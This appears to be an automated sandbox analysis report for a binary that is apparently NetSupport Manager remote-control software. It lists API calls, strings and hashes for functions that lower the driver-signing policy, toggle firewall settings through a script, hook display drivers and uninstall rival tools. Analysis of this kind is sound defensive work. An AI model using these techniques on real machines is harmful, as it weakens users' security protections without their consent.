                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleObjectProcessSingleSleepWaitwsprintf
                                                                                          • String ID: *** Use ICFConfig2 ***$CreateProcess() failed: $D$WScript.exe icfconfig.vbs %s "%s" "%s"$disable$enable$remove
                                                                                          • API String ID: 799559274-3812129836
                                                                                          • Opcode ID: 2bc2640153f45fa995fdeeae6fcf3e8f084e1ecd2d3ddb52f9845f7bf9e0d7b9
                                                                                          • Instruction ID: f6c2b91eb5fadd639648135925205fae7b3411691025294f7b3357c52b4677ff
                                                                                          • Opcode Fuzzy Hash: 2bc2640153f45fa995fdeeae6fcf3e8f084e1ecd2d3ddb52f9845f7bf9e0d7b9
                                                                                          • Instruction Fuzzy Hash: F751E9B1F40319ABCF14AF649C4ABBE7BAABB85700F044565F509A7281DFB49E40CB64
                                                                                          Function 005AE3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 88libraryloaderthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • LoadLibraryW.KERNEL32(newdev.dll), ref: 005AE3EA
                                                                                          • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesW), ref: 005AE403
                                                                                          • CreateThread.KERNEL32(00000000,00000000,005AE360,00000000,00000000,?), ref: 005AE426
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005AE431
                                                                                          Strings
                                                                                          • UpdateGdihook5, xrefs: 005AE3D6
                                                                                          • UpdateDriverForPlugAndPlayDevices returned error %d, xrefs: 005AE477
                                                                                          • UpdateDriverForPlugAndPlayDevicesW, xrefs: 005AE3FD
                                                                                          • newdev.dll, xrefs: 005AE3E5
                                                                                          • UpdateGdihook5 end, xrefs: 005AE498
                                                                                          • Returned from UpdateDriverForPlugAndPlayDevices, xrefs: 005AE484
                                                                                          • About to call UpdateDriverForPlugAndPlayDevices, xrefs: 005AE447
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Librarywsprintf$AddressCreateFreeLoadLocalProcThreadTimewvsprintf
                                                                                          • String ID: About to call UpdateDriverForPlugAndPlayDevices$Returned from UpdateDriverForPlugAndPlayDevices$UpdateDriverForPlugAndPlayDevices returned error %d$UpdateDriverForPlugAndPlayDevicesW$UpdateGdihook5$UpdateGdihook5 end$newdev.dll
                                                                                          • API String ID: 1673483672-437864977
                                                                                          • Opcode ID: 1a10e2ba2854d6b0c709240d4da1db446af49a1f46215d74a7d2a1ca7807b1e8
                                                                                          • Instruction ID: 4eab4fbb548239a8c5795adde322fd69ed167294400648dfce76d229fbc7fd2e
                                                                                          • Opcode Fuzzy Hash: 1a10e2ba2854d6b0c709240d4da1db446af49a1f46215d74a7d2a1ca7807b1e8
                                                                                          • Instruction Fuzzy Hash: C7210A757412052BD7109FA8AC5FFEF3B5AFF45B69F084027FD0582281EA61984146F2
                                                                                          Function 005D4280 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 63windowsleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindWindowW.USER32(NSMMain,00000000), ref: 005D428F
                                                                                          • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 005D42AB
                                                                                          • IsWindow.USER32(00000000), ref: 005D42B2
                                                                                          • Sleep.KERNEL32(00000064), ref: 005D42BA
                                                                                          • IsWindow.USER32(00000000), ref: 005D42BD
                                                                                          • FindWindowW.USER32(NSMMain,00000000), ref: 005D42CA
                                                                                          • FindWindowW.USER32(CICWClass,00000000), ref: 005D42F3
                                                                                          • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 005D4300
                                                                                          • FindWindowW.USER32(NSMWControl32,00000000), ref: 005D430D
                                                                                          • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 005D431C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Find$MessagePost$Sleep
                                                                                          • String ID: CICWClass$NSMMain$NSMWClass$NSMWControl32
                                                                                          • API String ID: 376684987-1708001160
                                                                                          • Opcode ID: 9f46ab0ff2c32940a4ceded29d12a05103fcaf7c09dbe1e890e37b0a750dee39
                                                                                          • Instruction ID: b6eb8644b0550be46222dc79e571f64aae386bcdd85ba5f0223d9266526ddd6d
                                                                                          • Opcode Fuzzy Hash: 9f46ab0ff2c32940a4ceded29d12a05103fcaf7c09dbe1e890e37b0a750dee39
                                                                                          • Instruction Fuzzy Hash: F3118476B8071237FB3127696C26FD6250A6F48F50F1D5413F600FA2D1D6A0E8018AB8
                                                                                          Function 005C0200 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 371COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005C024B
                                                                                            • Part of subcall function 005B4990: RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00596384,?,00000000,752F55F0,00000010,?,00596384,80000002,?,00020019), ref: 005B49AC
                                                                                            • Part of subcall function 005B44E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 005B452B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumOpenwsprintf
                                                                                          • String ID: %s\%s$ConfigList$Files\AppData$Files\CommonAppData$Files\LocalAppData$Files\Shared$General\ProductId$IsA()$Set HKLM\...%s\Files\Shared=1$Software\Productive Computer Insight$chg HKLM %s to %s from %s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                          • API String ID: 934838074-710025092
                                                                                          • Opcode ID: 3e21b48f2d38a643b5ae6a72ce4a0812270f892b6d203e5696608e2b05e3a4ef
                                                                                          • Instruction ID: 53342c8081abd097b478081e9905c48c991e3bb064f7913eb65e962b2c7b3860
                                                                                          • Opcode Fuzzy Hash: 3e21b48f2d38a643b5ae6a72ce4a0812270f892b6d203e5696608e2b05e3a4ef
                                                                                          • Instruction Fuzzy Hash: C2E1AC719006199FDB24DF54DC96FEABBB6BFE4304F044198E40963282DA72AF98CF50
                                                                                          Function 005D87F0 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 365registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D8832
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 005D88C9
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LoadOpenStringwsprintfwvsprintf
                                                                                          • String ID: /S$"%s%s" /* %s%s$%s=%s, e=%d$C:\Windows\Installer\$ImagePath$IsA()$SYSTEM\CurrentControlSet\Services\%s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                          • API String ID: 2115948977-3284006978
                                                                                          • Opcode ID: 5897fefe0ff9cb71ede1622383258484407bf4fd1c083d221afe49335f271d32
                                                                                          • Instruction ID: 4acd2cc98df31e616a47cd57d53ea0919c46be2ce0aa8a206616ab5013fbcd94
                                                                                          • Opcode Fuzzy Hash: 5897fefe0ff9cb71ede1622383258484407bf4fd1c083d221afe49335f271d32
                                                                                          • Instruction Fuzzy Hash: A3E1D034940219ABCB60EB64DC9EBEDBB75BFA4304F0446C9E40963292DF716F84CE61
                                                                                          Function 005D2880 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 217registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,HARDWARE\DeviceMap\Video,00000000,00020019,?), ref: 005D28C0
                                                                                          • RegQueryValueExW.ADVAPI32(?,\Device\Video0,00000000,?,?,?), ref: 005D28FB
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D2912
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,?,?), ref: 005D2A0A
                                                                                          • RegQueryValueExW.ADVAPI32(?,InstalledDisplayDrivers,?,?,?,00000200), ref: 005D2A4E
                                                                                          • RegSetValueExW.ADVAPI32(?,InstalledDisplayDrivers,00000000,00000007,?,?), ref: 005D2A68
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D2A96
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005D2AE9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseValue$OpenQuery
                                                                                          • String ID: HARDWARE\DeviceMap\Video$InstalledDisplayDrivers$\ControlSet$\Device\Video0$gfff
                                                                                          • API String ID: 3962714758-2659084398
                                                                                          • Opcode ID: 1810959d35aab8de333a886baf00017e98494d08a35d7b29808a96cd7f4fc8c7
                                                                                          • Instruction ID: 38a7c0e0baed23c45ffba20e4d368b1dbfaf0e286fd6a9f6599e5d74a4ecf00f
                                                                                          • Opcode Fuzzy Hash: 1810959d35aab8de333a886baf00017e98494d08a35d7b29808a96cd7f4fc8c7
                                                                                          • Instruction Fuzzy Hash: 0861D872E002199BDB34DF69DC89BEB7779FB98301F1441AAF50DD7241DA705E848B90
                                                                                          Function 005AEB30 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 118registrysleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Driver Signing,00000000,000F003F,?), ref: 005AEB4F
                                                                                          • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?), ref: 005AEB77
                                                                                          • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000004,?,00000004,?,Policy,00000000,?,?,?), ref: 005AEBA4
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Driver Signing,00000000,000F003F,?), ref: 005AEBE1
                                                                                          • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?), ref: 005AEC0D
                                                                                          • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000003,?), ref: 005AEC3C
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005AEC76
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Value$OpenQuery$Sleep
                                                                                          • String ID: Policy$Software\Microsoft\Driver Signing$cupol %d$cupol err, e=%d$lmpol %d$lmpol err, e=%d
                                                                                          • API String ID: 3131223082-2395713291
                                                                                          • Opcode ID: 29a7582d3a0e455329bbdf35a4982a05a6f9d542fac2a12333212ea971860c53
                                                                                          • Instruction ID: cf9f30510ce50c6cd2ecc50ca5956c3338785c2983623817eb30cd5d891cc8a3
                                                                                          • Opcode Fuzzy Hash: 29a7582d3a0e455329bbdf35a4982a05a6f9d542fac2a12333212ea971860c53
                                                                                          • Instruction Fuzzy Hash: FE414EB1640305BFEB308F50CC86FEA7BA9FB5AB15F144519F60696180D3B0AA44CB72
                                                                                          Function 0059AD70 Relevance: 22.7, APIs: 5, Strings: 10, Instructions: 192COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32 ref: 0059ADB9
                                                                                            • Part of subcall function 00599BE0: wvsprintfW.USER32(?,?,?), ref: 00599C0B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastwvsprintf
                                                                                          • String ID: DeviceID %d=%s$HDAUDIO\$OK.$PCI\$SetupDiCallClassInstaller failed, e=x%x$SetupDiCallClassInstaller...$SetupDiEnumDeviceInfo failed, e=x%x$SetupDiGetClassDevs failed, e=x%x$SetupDiSetClassInstallParams failed, e=x%x$USB\
                                                                                          • API String ID: 2157943386-3105874866
                                                                                          • Opcode ID: 71086a022b65c836fcc23b0405c189b68192573b242d31a181fead34121c4867
                                                                                          • Instruction ID: 838e19a84a2426f98a002780d9c4bea8a9315da74e0b74dd80a2a162613d9c72
                                                                                          • Opcode Fuzzy Hash: 71086a022b65c836fcc23b0405c189b68192573b242d31a181fead34121c4867
                                                                                          • Instruction Fuzzy Hash: DA6161B5905219AEEF10AB60DC89FFA7B7DFF44700F044199B60992191DBB49E84CFB2
                                                                                          Function 0059A700 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 249libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$Library$Free$Load
                                                                                          • String ID: setupapi.dll
                                                                                          • API String ID: 1672654688-3506073724
                                                                                          • Opcode ID: 009a6454449da9b67770ad3734851596c0695e13cbacd14fc81686beaeaaedcb
                                                                                          • Instruction ID: 473794815b9245e7cf8b681a66bf0c65c371d893dd4738f564abb0d15e43c2d6
                                                                                          • Opcode Fuzzy Hash: 009a6454449da9b67770ad3734851596c0695e13cbacd14fc81686beaeaaedcb
                                                                                          • Instruction Fuzzy Hash: E8A10A70A002199FDB24DF69CD98FAEB7B9FF88700F14459AE509E7250D7709E808FA1
                                                                                          Function 005D4CE0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 232registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumValue
                                                                                          • String ID: "$%s doesnt exist$%s exists$%s=%s, err=%d$Del %s, err=%d$Found %s$\%s
                                                                                          • API String ID: 2814608202-2885399614
                                                                                          • Opcode ID: a09310e5c5964e62b4818d7852a94c8d00bd5a6e454aa4e0499141b79b9bcb7c
                                                                                          • Instruction ID: bb1ab667ea6000a7bb3da6ccfe3ea891ccd110aa4bcb9cf9d44b346666ae4730
                                                                                          • Opcode Fuzzy Hash: a09310e5c5964e62b4818d7852a94c8d00bd5a6e454aa4e0499141b79b9bcb7c
                                                                                          • Instruction Fuzzy Hash: 7081817690012A9BDF34DB58CC85AEEB7B9FF84300F4485D6F50A97251EF709A488FA1
                                                                                          Function 005DAED0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 146registryprocesssynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 005DAF0A
                                                                                          • RegQueryValueExW.ADVAPI32(?,UninstallString,00000000,?,?,?), ref: 005DAF5D
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005DAF68
                                                                                          • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 005DB07D
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005DAFE2
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005DB01C
                                                                                          • CloseHandle.KERNEL32(?), ref: 005DB02F
                                                                                          • CloseHandle.KERNEL32(?), ref: 005DB038
                                                                                          • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 005DB04D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close$HandleOpenwsprintfwvsprintf$CreateDeleteLoadLocalObjectProcessQuerySingleStringTimeValueWait
                                                                                          • String ID: D$NukeRival : %s$UninstallString
                                                                                          • API String ID: 1387685028-3656226284
                                                                                          • Opcode ID: 0822ee4429495a14ce9e159395c8c6c94becfc249c9b23dbb6a124031e14d36b
                                                                                          • Instruction ID: e1080906f628d89542d1faec10e28d74e5cd8d70adb1f90899a2d21e2ed0bc99
                                                                                          • Opcode Fuzzy Hash: 0822ee4429495a14ce9e159395c8c6c94becfc249c9b23dbb6a124031e14d36b
                                                                                          • Instruction Fuzzy Hash: 0D41B775A00119ABEB34DB68DC4DFEA77B9FB48300F04429BF51D97291DA709E40CBA1
                                                                                          Function 005CC0B0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 142COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStockObject.GDI32(0000000D), ref: 005CC104
                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 005CC116
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 005CC208
                                                                                          • GetStockObject.GDI32(0000000D), ref: 005CC23C
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 005CC254
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$CreateFontIndirectStock
                                                                                          • String ID: ..\CTL32\util.cpp$IsA()$MS Shell Dlg$Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$hFont$hSubstitutedFont
                                                                                          • API String ID: 3061784605-2717502809
                                                                                          • Opcode ID: 61fce3a5f646c6d58eabf4fa65ca578a6e1b9f4f1851751ddd62a6e943c33d58
                                                                                          • Instruction ID: 49ac3302c32a55c09327fc08ac525fa6de049e506797710033bcdf59396babdc
                                                                                          • Opcode Fuzzy Hash: 61fce3a5f646c6d58eabf4fa65ca578a6e1b9f4f1851751ddd62a6e943c33d58
                                                                                          • Instruction Fuzzy Hash: 8A519E749007099FDB20DBE4DC6AFAE7FB5FB59700F544119F815AB282E7705904CBA0
                                                                                          Function 005C4540 Relevance: 21.1, APIs: 14, Instructions: 117windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005C4550
                                                                                          • GetDC.USER32(00000000), ref: 005C4579
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005C4588
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005C458D
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005C45A5
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005C45B0
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C45BE
                                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 005C460C
                                                                                          • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 005C4624
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C462F
